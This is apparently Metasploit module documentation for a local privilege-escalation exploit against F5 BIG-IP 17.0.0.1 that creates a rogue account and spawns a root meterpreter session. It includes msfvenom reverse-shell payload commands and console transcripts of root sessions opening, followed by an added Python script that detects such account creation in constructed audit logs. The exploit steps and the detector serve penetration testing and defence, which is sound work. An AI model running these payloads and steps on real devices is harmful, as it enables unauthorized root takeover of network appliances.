## Vulnerable Application

The vulnerable application is F5 Big-IP version 17.0.0.1 and below. It can be downloaded as a VMware image for free (you have to create an account) from https://downloads.f5.com. You can register for a free 30-day trial if you like, but it's not required to test this.

Boot the VM and set an admin password by logging in with the default credentials (admin / admin). You'll need that password.
## Verification Steps

1. Install the application
2. Start msfconsole
3. Do: get a non-root session somehow (eg: use `multi/handler` with `set PAYLOAD linux/x64/meterpreter_reverse_tcp`, then in another window:

   ```
   ./msfvenom -p linux/x64/meterpreter_reverse_tcp LHOST=10.0.0.179 LPORT=4444 -f elf > testexploit.elf && scp testexploit.elf root@10.0.0.162:/tmp && ssh root@10.0.0.162 /bin/bash << EOF
   chmod +x /tmp/testexploit.elf
   sudo -u apache /tmp/testexploit.elf
   EOF
   ```
   )
4. Do: `use exploit/linux/local/f5_create_user`
5. Do: `set SESSION <sessionid>`
6. Do: `run`
7. You should get a session
## Options

### USERNAME / PASSWORD

The username and final password for the account. If blank, they'll be randomly generated.

### CREATE_SESSION

If set (which is the default), will spawn a root session. Otherwise, simply creates the account.
## Scenarios

### F5 Big-IP 17.0.0.1 - Create a session with random creds

First, get a non-root session however you can. You can use a `multi/handler` and `msfvenom`:

```
msf6 > use multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set PAYLOAD linux/x64/meterpreter_reverse_tcp
PAYLOAD => linux/x64/meterpreter_reverse_tcp
msf6 exploit(multi/handler) > set LHOST 10.0.0.179
LHOST => 10.0.0.179
msf6 exploit(multi/handler) > exploit
[*] Started reverse TCP handler on 10.0.0.179:4444
[*] Meterpreter session 1 opened (10.0.0.179:4444 -> 10.0.0.162:34140) at 2022-11-14 15:59:49 -0800
[...run the payload...]
meterpreter > getuid
Server username: apache
meterpreter > bg
msf6 exploit(multi/handler) > setg SESSION 1
SESSION => 1
```
To create and run the payload, in another window:

```
$ ./msfvenom -p linux/x64/meterpreter_reverse_tcp LHOST=10.0.0.179 LPORT=4444 -f elf > testexploit.elf && chmod +x testexploit.elf && scp testexploit.elf root@10.0.0.162:/tmp && ssh root@10.0.0.162 sudo -u apache /tmp/testexploit.elf
[-] No platform was selected, choosing Msf::Module::Platform::Linux from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 1068640 bytes
Final size of elf file: 1068640 bytes
testexploit.elf
```
Now that we have a session, we can just run the module:

```
msf6 exploit(multi/handler) > use exploit/linux/local/f5_create_user
[*] No payload configured, defaulting to cmd/unix/python/meterpreter/reverse_tcp
msf6 exploit(linux/local/f5_create_user) > exploit
[*] Started reverse TCP handler on 10.0.0.179:4444
[*] Will attempt to create user 7yI5vLIK / woquVd36PhcG, then change password to 9d9s83bBPwu5 when creating a session
[+] Service didn't return an error, so user was likely created!
[*] Attempting create a root session...
[*] Sending stage (40168 bytes) to 10.0.0.162
[*] Meterpreter session 2 opened (10.0.0.179:4444 -> 10.0.0.162:45254) at 2022-11-14 16:02:10 -0800
meterpreter > getuid
Server username: root
```
### F5 Big-IP 17.0.0.1 - Create a session with set creds

Create a session as shown above, then:

```
msf6 exploit(linux/local/f5_create_user) > set USERNAME mymsfdemouser
USERNAME => mymsfdemouser
msf6 exploit(linux/local/f5_create_user) > set PASSWORD mybigmsfdemopassword
PASSWORD => mybigmsfdemopassword
msf6 exploit(linux/local/f5_create_user) > set VERBOSE true
VERBOSE => true
msf6 exploit(linux/local/f5_create_user) > exploit
[*] Started reverse TCP handler on 10.0.0.179:4444
[*] Will attempt to create user mymsfdemouser / QVEE0pqM7pAd, then change password to mybigmsfdemopassword when creating a session
[*] Hashing the password with a pseudorandom salt
[+] Service didn't return an error, so user was likely created!
[*] Attempting create a root session...
[*] Sending stage (40164 bytes) to 10.0.0.162
[*] Output from su command: Password: You are required to change your password immediately (root enforced)
(current) BIG-IP password: New BIG-IP password: Retype new BIG-IP password: Changing password for mymsfdemouser.
[*] Meterpreter session 3 opened (10.0.0.179:4444 -> 10.0.0.162:49646) at 2022-11-14 16:03:04 -0800
meterpreter > getuid
Server username: root
```
### F5 Big-IP 17.0.0.1 - Just create an account with random creds

Get a session as shown above, then:

```
msf6 exploit(linux/local/f5_create_user) > set CREATE_SESSION false
CREATE_SESSION => false
msf6 exploit(linux/local/f5_create_user) > exploit
[*] Started reverse TCP handler on 10.0.0.179:4444
[*] Will attempt to create user hKjGGrlU / yRQijFQjVjqa
[*] Hashing the password with a pseudorandom salt
[+] Service didn't return an error, so user was likely created!
^C[*] Exploit completed, but no session was created.
```
### F5 Big-IP 17.0.0.1 - Just create an account with set creds

Get a session as shown above, then:

```
msf6 exploit(linux/local/f5_create_user) > set CREATE_SESSION false
CREATE_SESSION => false
msf6 exploit(linux/local/f5_create_user) > set USERNAME mymsfdemouser2
USERNAME => mymsfdemouser2
msf6 exploit(linux/local/f5_create_user) > set PASSWORD mybigmsfdemopassword
PASSWORD => mybigmsfdemopassword
msf6 exploit(linux/local/f5_create_user) > exploit
[*] Started reverse TCP handler on 10.0.0.179:4444
[*] Will attempt to create user mymsfdemouser2 / mybigmsfdemopassword
[*] Hashing the password with a pseudorandom salt
[+] Service didn't return an error, so user was likely created!
^C[*] Exploit completed, but no session was created.
```
### F5 Big-IP 17.0.0.1 - Create an account with an error

Get a session as shown above, then (we use a duplicate username):

```
[*] Started reverse TCP handler on 10.0.0.179:4444
[*] Will attempt to create user mymsfdemouser2 / mybigmsfdemopassword
[*] Hashing the password with a pseudorandom salt
[-] mcp query returned an error message: 01020066:3: The requested user (mymsfdemouser2) already exists in partition Common. (code: 16908390)
```
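The artifacts the scenarios above leave on the device are the same in every case: a new local account in partition `Common`, created from a foothold running as the `apache` service user rather than by an administrator, usually with a generated username such as `7yI5vLIK` or `hKjGGrlU`, and (when `CREATE_SESSION` is set) an immediate password change by that account during the forced `su` password rotation. The following Python script is an added detection example for this write-up, not code from the Metasploit module or from F5. It runs over constructed, generic syslog-style audit lines; they are a hypothetical format made up for the example, not BIG-IP's actual audit log, so the two regular expressions must be adapted to whatever the device really emits. The expected-account baseline and the list of service identities are likewise assumptions.

```python
import re
from dataclasses import dataclass, field

# Hypothetical baseline of accounts that are expected to exist (not taken from a real BIG-IP).
EXPECTED_ACCOUNTS = {"admin", "root", "deploy"}

# Hypothetical identities that should never be creating accounts. The page shows the
# initial foothold running as 'apache', so that is the one that matters here.
SERVICE_IDENTITIES = {"apache", "tomcat", "nobody"}

# Constructed audit lines for the example. This is NOT BIG-IP's real audit format;
# adjust CREATE_RE / PASSWD_RE to match the lines your device actually produces.
SAMPLE_AUDIT_LINES = [
    "Nov 14 16:01:50 bigip1 audit: user admin - modified user 'deploy' in partition Common",
    "Nov 14 16:02:09 bigip1 audit: user apache - created user '7yI5vLIK' in partition Common",
    "Nov 14 16:02:10 bigip1 audit: user 7yI5vLIK - password changed for user '7yI5vLIK'",
    "Nov 14 16:03:00 bigip1 audit: user admin - created user 'mymsfdemouser' in partition Common",
]

CREATE_RE = re.compile(r"user (?P<actor>\S+) - created user '(?P<target>[^']+)'")
PASSWD_RE = re.compile(r"user (?P<actor>\S+) - password changed for user '(?P<target>[^']+)'")


@dataclass
class Finding:
    account: str
    created_by: str
    reasons: list = field(default_factory=list)


def looks_random(name: str) -> bool:
    """Heuristic for generated usernames like '7yI5vLIK': at least 8 characters, mixed
    case, and either a digit or frequent case flips. Human-chosen names such as
    'deploy' or 'mymsfdemouser' do not match."""
    if len(name) < 8:
        return False
    has_upper = any(c.isupper() for c in name)
    has_lower = any(c.islower() for c in name)
    has_digit = any(c.isdigit() for c in name)
    flips = sum(
        1 for a, b in zip(name, name[1:])
        if a.isalpha() and b.isalpha() and a.isupper() != b.isupper()
    )
    return has_upper and has_lower and (has_digit or flips >= 3)


def find_suspicious_account_creations(lines, expected=EXPECTED_ACCOUNTS,
                                      service_ids=SERVICE_IDENTITIES):
    """Return one Finding per newly created account that trips at least one check.
    A later self-service password change by a flagged account adds a further reason,
    matching the forced rotation seen in the 'su' output above."""
    findings = {}
    for line in lines:
        m = CREATE_RE.search(line)
        if m:
            actor, target = m.group("actor"), m.group("target")
            f = Finding(account=target, created_by=actor)
            if target not in expected:
                f.reasons.append("account not in expected baseline")
            if actor in service_ids:
                f.reasons.append(f"created by service identity '{actor}'")
            if looks_random(target):
                f.reasons.append("random-looking username")
            if f.reasons:
                findings[target] = f
            continue
        m = PASSWD_RE.search(line)
        if m and m.group("target") in findings and m.group("actor") == m.group("target"):
            findings[m.group("target")].reasons.append(
                "account changed its own password right after creation")
    return list(findings.values())


if __name__ == "__main__":
    for finding in find_suspicious_account_creations(SAMPLE_AUDIT_LINES):
        print(f"{finding.account} (created by {finding.created_by}): "
              + "; ".join(finding.reasons))
```

On the constructed input the account created from the `apache` foothold collects four reasons, while `mymsfdemouser`, created by `admin`, is reported only because it is absent from the baseline; a baseline check alone is therefore enough to catch the "set creds" scenarios, and the actor and name heuristics add confidence for the random-creds ones. The mcp error in the last scenario (`01020066:3`) is the other observable: repeated "already exists" failures against the same account name are worth alerting on as well, since a legitimate administrator rarely retries a creation that has already succeeded.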